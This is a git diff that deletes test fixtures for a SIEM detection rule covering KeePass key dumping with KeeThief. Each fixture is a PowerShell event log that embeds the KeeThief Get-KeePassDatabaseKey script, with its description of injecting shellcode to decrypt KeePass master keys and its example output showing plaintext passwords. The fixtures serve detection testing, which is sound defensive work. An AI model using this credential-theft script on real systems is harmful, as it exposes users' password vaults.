If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount) is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs, returning the plaintext/unprotected key data. .PARAMETER Process Optional KeePass process object to pass in on the pipeline. .EXAMPLE PS C:\\> Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49045328 EncryptedBlob : {113, 148, 127, 29...} EncryptedBlobLen : 64 PlaintextBlob : {120, 181, 162, 116...} Plaintext : eLWidCSt... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpKeyFile KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49037240 EncryptedBlob : {137, 185, 6, 97...} EncryptedBlobLen : 32 PlaintextBlob : {177, 5, 150, 205...} Plaintext : sQWWzdcT... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\Documents\\s.license Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpPassword KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 48920376 EncryptedBlob : {228, 78, 75, 16...} EncryptedBlobLen : 16 PlaintextBlob : {80, 97, 115, 115...} Plaintext : Password123! 
KeyFilePath : .EXAMPLE PS C:\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount ....# > [CmdletBinding()] param ( [Parameter(Position = 0, ValueFromPipeline = $True)] [System.Diagnostics.Process[]] [ValidateNotNullOrEmpty()] $Process ) BEGIN { if(-not $PSBoundParameters['Process']) { try { $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\.'} } catch { throw 'No KeePass 2.X instances open!' } } # load file off of disk instead # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\ReleaseKeePass.exe).FullName) # the KeyTheft assembly, generated with \"Out-CompressedDll -FilePath .\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\compressed.ps1\" } PROCESS { ForEach($KeePassProcess in $Process) { if($KeePassProcess.FileVersion -match '^2\\.') { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\" $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess)) if($Keys) { ForEach ($Key in $Keys) { ForEach($UserKey in $Key.UserKeys) { $KeyType = $UserKey.GetType().Name $UserKeyObject = New-Object PSObject $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress $UserKeyObject | Add-Member Noteproperty 
'EncryptedBlob' $UserKey.encryptedBlob $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob if($KeyType -eq 'KcpPassword') { $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob) } else { $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob) } $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext if($KeyType -eq 'KcpUserAccount') { try { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $UserName = $WMIProcess.GetOwner().User $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath } catch { Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\" } } else { $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath } $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys') $UserKeyObject } } } else { Write-Verbose \"No keys found for $($KeePassProcess.ID)\" } } else { Write-Warning \"Only KeePass 2.X is supported at this time.\" } } }}", "object.process.id": "7064", "object.value": "# requires -version 2function Get-KeePassDatabaseKey {<# .SYNOPSIS Retrieves database mastey key information for unlocked KeePass database. Function: Get-KeePassDatabaseKey Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline. Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys() method on it. 
GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey. If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount) is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs, returning the plaintext/unprotected key data. .PARAMETER Process Optional KeePass process object to pass in on the pipeline. .EXAMPLE PS C:\\> Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49045328 EncryptedBlob : {113, 148, 127, 29...} EncryptedBlobLen : 64 PlaintextBlob : {120, 181, 162, 116...} Plaintext : eLWidCSt... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpKeyFile KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49037240 EncryptedBlob : {137, 185, 6, 97...} EncryptedBlobLen : 32 PlaintextBlob : {177, 5, 150, 205...} Plaintext : sQWWzdcT... 
KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\Documents\\s.license Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpPassword KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 48920376 EncryptedBlob : {228, 78, 75, 16...} EncryptedBlobLen : 16 PlaintextBlob : {80, 97, 115, 115...} Plaintext : Password123! KeyFilePath : .EXAMPLE PS C:\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount ....# > [CmdletBinding()] param ( [Parameter(Position = 0, ValueFromPipeline = $True)] [System.Diagnostics.Process[]] [ValidateNotNullOrEmpty()] $Process ) BEGIN { if(-not $PSBoundParameters['Process']) { try { $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\.'} } catch { throw 'No KeePass 2.X instances open!' 
} } # load file off of disk instead # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\ReleaseKeePass.exe).FullName) # the KeyTheft assembly, generated with \"Out-CompressedDll -FilePath .\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\compressed.ps1\" } PROCESS { ForEach($KeePassProcess in $Process) { if($KeePassProcess.FileVersion -match '^2\\.') { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\" $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess)) if($Keys) { ForEach ($Key in $Keys) { ForEach($UserKey in $Key.UserKeys) { $KeyType = $UserKey.GetType().Name $UserKeyObject = New-Object PSObject $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob if($KeyType -eq 'KcpPassword') { $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob) } else { $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob) } $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext if($KeyType -eq 'KcpUserAccount') { try { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $UserName = 
$WMIProcess.GetOwner().User $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath } catch { Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\" } } else { $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath } $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys') $UserKeyObject } } } else { Write-Verbose \"No keys found for $($KeePassProcess.ID)\" } } else { Write-Warning \"Only KeePass 2.X is supported at this time.\" } } }}", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T11:33:47.757Z", "status": "success", "subject": "account", "subject.account.id": "S-1-5-18", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T18:55:02.710Z", "type": "raw", "uuid": "3e774e05-1f1a-4b58-812a-3127158afc3a"}
-
-# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь
-expect 1 {"correlation_name": "Keepass_Key_Dump_Via_KeeThief"}
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_4.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_4.sc
deleted file mode 100644
index 4a34dbda..00000000
--- a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_4.sc
+++ /dev/null
@@ -1,4 +0,0 @@ -{"action": "execute", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-PowerShell\",\"Guid\":\"{a0c1853b-5c40-4b15-8766-3cf1c58f985a}\"},\"EventID\":\"4104\",\"Version\":\"1\",\"Level\":\"3\",\"Task\":\"2\",\"Opcode\":\"15\",\"Keywords\":\"0x0\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T18:55:02.7106082Z\"},\"EventRecordID\":\"273644\",\"Correlation\":{\"ActivityID\":\"{83cf053f-9302-0000-d6c4-7b840293d901}\"},\"Execution\":{\"ProcessID\":\"7064\",\"ThreadID\":\"5708\"},\"Channel\":\"Microsoft-Windows-PowerShell/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"1\",\"Name\":\"MessageNumber\"},{\"text\":\"1\",\"Name\":\"MessageTotal\"},{\"text\":\"# requires -version 2\\n\\nfunction Get-KeePassDatabaseKey {\\n<# \\n .SYNOPSIS\\n \\n Retrieves database mastey key information for unlocked KeePass database.\\n\\n Function: Get-KeePassDatabaseKey\\n Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y)\\n License: BSD 3-Clause\\n Required Dependencies: None\\n Optional Dependencies: None\\n\\n .DESCRIPTION\\n \\n Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline.\\n Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys()\\n method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate\\n all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted\\n from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey.\\n If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount)\\n is extracted, including the DPAPI encrypted data blobs of key data. 
For any encrypted blobs found, shellcode\\n is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs,\\n returning the plaintext/unprotected key data.\\n\\n .PARAMETER Process\\n\\n Optional KeePass process object to pass in on the pipeline.\\n\\n .EXAMPLE\\n\\n PS C:\\\\> Get-KeePassDatabaseKey -Verbose\\n VERBOSE: Examining KeePass process 4184 for master keys\\n\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpUserAccount\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 49045328\\n EncryptedBlob : {113, 148, 127, 29...}\\n EncryptedBlobLen : 64\\n PlaintextBlob : {120, 181, 162, 116...}\\n Plaintext : eLWidCSt...\\n KeyFilePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\AppData\\\\Roaming\\\\KeePass\\\\ProtectedUserKey.bin\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpKeyFile\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 49037240\\n EncryptedBlob : {137, 185, 6, 97...}\\n EncryptedBlobLen : 32\\n PlaintextBlob : {177, 5, 150, 205...}\\n Plaintext : sQWWzdcT...\\n KeyFilePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Documents\\\\s.license\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpPassword\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 48920376\\n EncryptedBlob : {228, 78, 75, 16...}\\n EncryptedBlobLen : 16\\n PlaintextBlob : {80, 97, 115, 115...}\\n Plaintext : Password123!\\n KeyFilePath :\\n\\n .EXAMPLE\\n\\n PS C:\\\\> Get-Process KeePass | 
Get-KeePassDatabaseKey -Verbose\\n VERBOSE: Examining KeePass process 4184 for master keys\\n\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpUserAccount\\n ....\\n# >\\n [CmdletBinding()] \\n param (\\n [Parameter(Position = 0, ValueFromPipeline = $True)]\\n [System.Diagnostics.Process[]]\\n [ValidateNotNullOrEmpty()]\\n $Process\\n )\\n \\n BEGIN {\\n if(-not $PSBoundParameters['Process']) {\\n try {\\n $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\\\.'}\\n }\\n catch {\\n throw 'No KeePass 2.X instances open!'\\n }\\n }\\n\\n # load file off of disk instead\\n # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\\\ReleaseKeePass.exe).FullName)\\n\\n # the KeyTheft assembly, generated with \\\"Out-CompressedDll -FilePath .\\\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\\\compressed.ps1\\\"\\n\\n }\\n\\n PROCESS {\\n\\n ForEach($KeePassProcess in $Process) {\\n\\n if($KeePassProcess.FileVersion -match '^2\\\\.') {\\n\\n $WMIProcess = Get-WmiObject win32_process -Filter \\\"ProcessID = $($KeePassProcess.ID)\\\"\\n $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath\\n\\n Write-Verbose \\\"Examining KeePass process $($KeePassProcess.ID) for master keys\\\"\\n\\n $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess))\\n\\n if($Keys) {\\n\\n ForEach ($Key in $Keys) {\\n\\n ForEach($UserKey in $Key.UserKeys) {\\n\\n $KeyType = $UserKey.GetType().Name\\n\\n $UserKeyObject = New-Object PSObject\\n $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation\\n $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType\\n $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion\\n $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID\\n $UserKeyObject | Add-Member Noteproperty 
'ExecutablePath' $ExecutablePath\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen\\n $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob\\n\\n if($KeyType -eq 'KcpPassword') {\\n $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob)\\n }\\n else {\\n $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob)\\n }\\n\\n $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext\\n\\n if($KeyType -eq 'KcpUserAccount') {\\n try {\\n $WMIProcess = Get-WmiObject win32_process -Filter \\\"ProcessID = $($KeePassProcess.ID)\\\"\\n $UserName = $WMIProcess.GetOwner().User\\n\\n $ProtectedUserKeyPath = Resolve-Path -Path \\\"$($Env:WinDir | Split-Path -Qualifier)\\\\Users\\\\*$UserName*\\\\AppData\\\\Roaming\\\\KeePass\\\\ProtectedUserKey.bin\\\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path\\n\\n $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath\\n\\n }\\n catch {\\n Write-Warning \\\"Error enumerating the owner of $($KeePassProcess.ID) : $_\\\"\\n }\\n }\\n else {\\n $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath\\n }\\n\\n $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys')\\n $UserKeyObject\\n }\\n }\\n }\\n else {\\n Write-Verbose \\\"No keys found for $($KeePassProcess.ID)\\\"\\n }\\n }\\n else {\\n Write-Warning \\\"Only KeePass 2.X is supported at this time.\\\"\\n }\\n }\\n }\\n}\\n\",\"Name\":\"ScriptBlockText\"},{\"text\":\"d4643a9b-6f64-4fbc-95e8-c2524689590f\",\"Name\":\"ScriptBlockId\"},{\"text\":\"C:\\\\Users\\\\Administrator\\\\Downloads\\\\KeeThief_test\\\\KeeThief-master\\\\KeeTheft\\\\KeeTheft\\\\KeeThief.ps1\",\"Name\":\"Path\"}]}}}", "category.generic": "Command", "category.high": "System 
Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Common_PowerShell_4104_Command_executed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4104", "normalized": true, "numfield1": 1, "numfield2": 1, "object": "command", "object.account.id": "S-1-5-18", "object.fullpath": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\KeeThief.ps1", "object.id": "d4643a9b-6f64-4fbc-95e8-c2524689590f", "object.name": "KeeThief.ps1", "object.path": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\", "object.process.cmdline": "# requires -version 2function Get-KeePassDatabaseKey {<# .SYNOPSIS Retrieves database mastey key information for unlocked KeePass database. Function: Get-KeePassDatabaseKey Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline. Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys() method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey. 
If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount) is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs, returning the plaintext/unprotected key data. .PARAMETER Process Optional KeePass process object to pass in on the pipeline. .EXAMPLE PS C:\\> Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49045328 EncryptedBlob : {113, 148, 127, 29...} EncryptedBlobLen : 64 PlaintextBlob : {120, 181, 162, 116...} Plaintext : eLWidCSt... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpKeyFile KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49037240 EncryptedBlob : {137, 185, 6, 97...} EncryptedBlobLen : 32 PlaintextBlob : {177, 5, 150, 205...} Plaintext : sQWWzdcT... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\Documents\\s.license Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpPassword KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 48920376 EncryptedBlob : {228, 78, 75, 16...} EncryptedBlobLen : 16 PlaintextBlob : {80, 97, 115, 115...} Plaintext : Password123! 
KeyFilePath : .EXAMPLE PS C:\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount ....# > [CmdletBinding()] param ( [Parameter(Position = 0, ValueFromPipeline = $True)] [System.Diagnostics.Process[]] [ValidateNotNullOrEmpty()] $Process ) BEGIN { if(-not $PSBoundParameters['Process']) { try { $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\.'} } catch { throw 'No KeePass 2.X instances open!' } } # load file off of disk instead # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\ReleaseKeePass.exe).FullName) # the KeyTheft assembly, generated with \"Out-CompressedDll -FilePath .\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\compressed.ps1\" } PROCESS { ForEach($KeePassProcess in $Process) { if($KeePassProcess.FileVersion -match '^2\\.') { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\" $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('AnotherMethod').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess)) if($Keys) { ForEach ($Key in $Keys) { ForEach($UserKey in $Key.UserKeys) { $KeyType = $UserKey.GetType().Name $UserKeyObject = New-Object PSObject $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress $UserKeyObject | Add-Member Noteproperty 
'EncryptedBlob' $UserKey.encryptedBlob $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob if($KeyType -eq 'KcpPassword') { $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob) } else { $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob) } $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext if($KeyType -eq 'KcpUserAccount') { try { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $UserName = $WMIProcess.GetOwner().User $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath } catch { Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\" } } else { $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath } $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys') $UserKeyObject } } } else { Write-Verbose \"No keys found for $($KeePassProcess.ID)\" } } else { Write-Warning \"Only KeePass 2.X is supported at this time.\" } } }}", "object.process.id": "7064", "object.value": "# requires -version 2function Get-KeePassDatabaseKey {<# .SYNOPSIS Retrieves database mastey key information for unlocked KeePass database. Function: Get-KeePassDatabaseKey Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline. Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys() method on it. 
